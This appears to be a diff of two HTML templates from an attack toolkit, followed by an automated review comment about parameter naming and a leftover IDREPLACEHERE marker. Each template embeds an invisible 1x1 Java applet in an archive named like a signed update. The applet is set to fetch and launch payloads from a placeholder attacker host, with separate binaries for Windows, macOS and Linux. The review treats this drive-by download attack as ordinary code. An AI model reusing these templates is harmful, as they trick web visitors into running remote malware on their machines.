<applet width="1" height="1" id="IDREPLACEHERE" code="Java.class" archive="Signed_Update.jar"><param name="WINDOWSPLZ" value="http://ipaddrhere/msf.exe"><param name="ILIKESTUFF" value=""><param name="OSX" value="http://ipaddrhere/mac.bin"><param name="LINUX" value="http://ipaddrhere/nix.bin"><param name="X64" value=""><param name="X86" value=""><param name="HUGSNOTDRUGS" value="freehugs"><param name="LAUNCH" value="YES"><param name="nextPage" value=""><param name="separate_jvm" value="true"></applet>
|
<applet code="Java.class" width="1" height="1" id="IDREPLACEHERE" archive="Signed_Update.jar"><param name="name" value="IDREPLACEHERE"><param name="1" value="http://ipaddrhere/msf.exe"><param name="2" value=""><param name="3" value="http://ipaddrhere/mac.bin"><param name="4" value="http://ipaddrhere/nix.bin"><param name="5" value=""><param name="6" value=""><param name="7" value="freehugs"><param name="8" value="YES"><param name="9" value=""><param name="10" value=""><param name="separate_jvm" value="true"></applet>
|
||||||
|
|
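Review bot: this template moves in the opposite direction from the previous hunk: it replaces the named params (`WINDOWSPLZ`, `ILIKESTUFF`, `OSX`, `LINUX`, `X64`, `X86`, `HUGSNOTDRUGS`, `LAUNCH`, `nextPage`) with the numbered `1`..`10` scheme, but the version it adopts is the old form of the other template, complete with the `id="IDREPLACEHERE"` and `<param name="name" value="IDREPLACEHERE">` that the CHANGELOG says are no longer used. The two applet templates should end this commit identical apart from intentional differences; as written, one carries the marker and the other does not, so whichever path performs the `IDREPLACEHERE` substitution behaves differently depending on which template is loaded. If the applet still reads `nextPage`, confirm which numbered slot now carries it.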